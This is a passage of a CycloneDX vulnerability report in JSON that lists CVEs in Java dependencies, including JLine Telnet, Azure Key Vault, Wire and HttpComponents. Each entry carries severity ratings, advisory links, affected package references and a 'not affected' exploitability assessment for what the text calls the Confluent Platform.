          "url": "https://github.com/apache/logging-log4j2/releases/tag/rel/2.25.5"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/releases/tag/rel/2.26.1"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/json-template-layout.html#event-template-resolver-message"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-49844"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49844"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49844"
        }
      ],
      "published": "2026-07-10T22:16:42+00:00",
      "updated": "2026-07-14T20:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4",
          "versions": [
            {
              "version": "2.25.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:8610652d-66ed-439d-bbad-dc2000a85be5/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#e47f64f1-793a-447d-a466-d220a6b4f89b"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8f1cd299-348e-4af1-a24d-5050c4c5d6cf"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#4c041d44-a575-4bfe-aeae-fd877af91051"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#a36188cc-bc5e-4592-b4bb-06aee2d62c70"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#d0817e32-217b-4890-a7bf-55e3e86579ae"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f01cadb5-e17b-453b-beb8-9e704c319a96"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#8c2e06e2-ceb0-4578-bddc-c802a823c221"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#da5f279a-f2c6-47f5-9583-1378caca54e6"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#df9c173e-18de-4a29-bbc1-b7420d80b9cd"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#c1037260-25b3-4de7-936e-eb4e285d74d1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c0e606cf-0cd3-4489-a6bb-43a194f683be"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ebab262b-b923-4403-bd81-716c85a4ed6d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3c9639ac-1ab4-4e3f-bd60-5a4dc24cbca2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56740",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not limit the number of environment variables a client may inject via the Telnet NEW-ENVIRON option, and TelnetIO.readNEVariables() in TelnetIO.java:1127-1180 stores each variable pair in a HashMap held by ConnectionData, allowing an unauthenticated attacker to flood unique variable pairs before the terminating IAC SE byte and exhaust JVM heap memory with an OutOfMemoryError. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56740"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/0389f0ee6d0375901b602671ad5dafd4d1d4ee09"
        },
        {
          "url": "https://github.com/jline/jline3/commit/4ee3a73849ffb9a85ec748e4e8cd8f6d81f84f40"
        },
        {
          "url": "https://github.com/jline/jline3/commit/934f09e6128cee33c2b13d42b6e859c1ee2d194b"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2001"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/jline-3.30.14"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-47qp-hqvx-6r3f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56740"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:23:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.30.4",
          "versions": [
            {
              "version": "3.30.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:8610652d-66ed-439d-bbad-dc2000a85be5/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NEW-ENVIRON variable-flooding sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-56741",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not apply an upper bound to terminal dimensions received via the Telnet NAWS option, and TelnetIO.handleNAWS() in TelnetIO.java:856-879 reads client-supplied width and height as 16-bit unsigned integers and passes values such as 65535x65535 to setTerminalGeometry(), allowing an unauthenticated remote attacker to repeatedly alternate values and trigger continuous expensive rendering work that causes CPU exhaustion and denial of service. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56741"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/3ea9cad8699714dc072fade29d36be0d1e23d708"
        },
        {
          "url": "https://github.com/jline/jline3/commit/733eb353dca7b0ea0252e724445b6defa29c393e"
        },
        {
          "url": "https://github.com/jline/jline3/commit/86b7ba7801988aadb1a67555629522a71d603bd3"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-2r2c-cx56-8933"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56741"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:17:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.30.4",
          "versions": [
            {
              "version": "3.30.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:8610652d-66ed-439d-bbad-dc2000a85be5/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NAWS terminal-geometry sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-33117",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        287,
        347
      ],
      "description": "The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.",
      "recommendation": "Upgrade com.azure:azure-security-keyvault-keys to version 4.10.6",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33117"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/commit/1b5c5c79d85a5c9a9cfd07f6cdff6fd0f50eccf9"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/pull/48476"
        },
        {
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33117"
        }
      ],
      "published": "2026-05-12T18:17:04+00:00",
      "updated": "2026-06-17T10:36:58+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3",
          "versions": [
            {
              "version": "4.10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3",
          "versions": [
            {
              "version": "4.10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2",
          "versions": [
            {
              "version": "4.9.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#f3f2d98c-cb75-4aeb-9a81-3942ecc4d272"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#c51aa5b1-1762-4fcb-ab83-d2987e2d650a"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#7cd723cd-48a8-4e08-b30d-cb9abd300d04"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#cffa5baf-a172-4dd5-bdbb-4e4f52ea4884"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#a8cc42ce-53a1-4cf0-854c-8eff3a98b80e"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#f45b930b-3502-4a1f-a96b-521a51af621c"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#a8055e2f-7499-45a2-aa37-cdfcc01f8ea3"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "protected_by_mitigating_control",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product delegates key operations to the Azure Key Vault service (RSA-OAEP wrap/unwrap for envelope encryption); the vulnerable client-side local crypto path is not exercised, so the security-feature bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-45799",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        129
      ],
      "description": "Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.3.0 and 7.0.0-alpha03, ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() in wire-runtime do not validate that a LENGTH_DELIMITED field length is non-negative before skip(), allowing a crafted protobuf varint encoding -128 as a signed Int to make skip(-128) move the internal position negative and make the next readByte() throw ArrayIndexOutOfBoundsException instead of the documented IOException or ProtocolException, which can crash services using ProtoAdapter.decode(byte[]) on untrusted payloads. This issue is fixed in versions 6.3.0 and 7.0.0-alpha03.",
      "recommendation": "Upgrade com.squareup.wire:wire-runtime-jvm to version 6.3.0, 7.0.0-alpha03",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45799"
        },
        {
          "url": "https://github.com/square/wire"
        },
        {
          "url": "https://github.com/square/wire/commit/47d5b0dba53935d5332cd41a80a353b3fc90e7b0"
        },
        {
          "url": "https://github.com/square/wire/commit/e4e56fab38a547d9625f05c97f1d8f0bcc3a5773"
        },
        {
          "url": "https://github.com/square/wire/pull/3595"
        },
        {
          "url": "https://github.com/square/wire/pull/3597"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/6.3.0"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/7.0.0-alpha03"
        },
        {
          "url": "https://github.com/square/wire/security/advisories/GHSA-7xpr-hc2w-34m9"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45799"
        }
      ],
      "published": "2026-07-17T20:17:18+00:00",
      "updated": "2026-08-12T19:04:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0",
          "versions": [
            {
              "version": "5.5.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#ff20ec94-1e85-44ad-867e-36d2cc579f58"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#a8409531-a50f-44bb-8a3a-28254e0bbdd0"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#ba3a6317-4742-4142-bd97-b2e26c7fdf9b"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#cd4be7b5-7cf4-4354-9dee-c6abc70d39a2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54399",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Uncontrolled Resource Consumption vulnerability in the HTTP/1.1 message parser\u00a0in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows\u00a0an remote attacker to cause a denial of service through memory exhaustion by sending messages with excessive number of headers / excessive header length",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54399"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54399"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/d96a00fec9b2e19f8005e35681df5f6cd6e21a9e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/fdc53a32fe0fccf098cc67e71cd125e447c759ed"
        },
        {
          "url": "https://lists.apache.org/thread/zmxh1pl2zohov5ntdh4lt85gfrlchgpy"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54399"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54399"
        }
      ],
      "published": "2026-07-01T17:16:36+00:00",
      "updated": "2026-07-24T20:04:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#51e34964-788a-4016-8698-f613a6c73ba4"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#6404a413-de49-4f98-a952-6c889811e73f"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#b12d291e-608d-4884-99a8-b39b58e3fa3f"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#b8d1add1-efaa-4377-aaf4-fe4aa79ec647"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#f3b7b106-d9b3-4ed6-8356-56e1d860c0ae"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#508c75d7-87db-45f0-9334-875a6d947e1f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e071df24-071a-4cac-b942-81ac09d91d8b"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#6754d603-2bbd-4f15-8c0b-55d2893ffec0"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
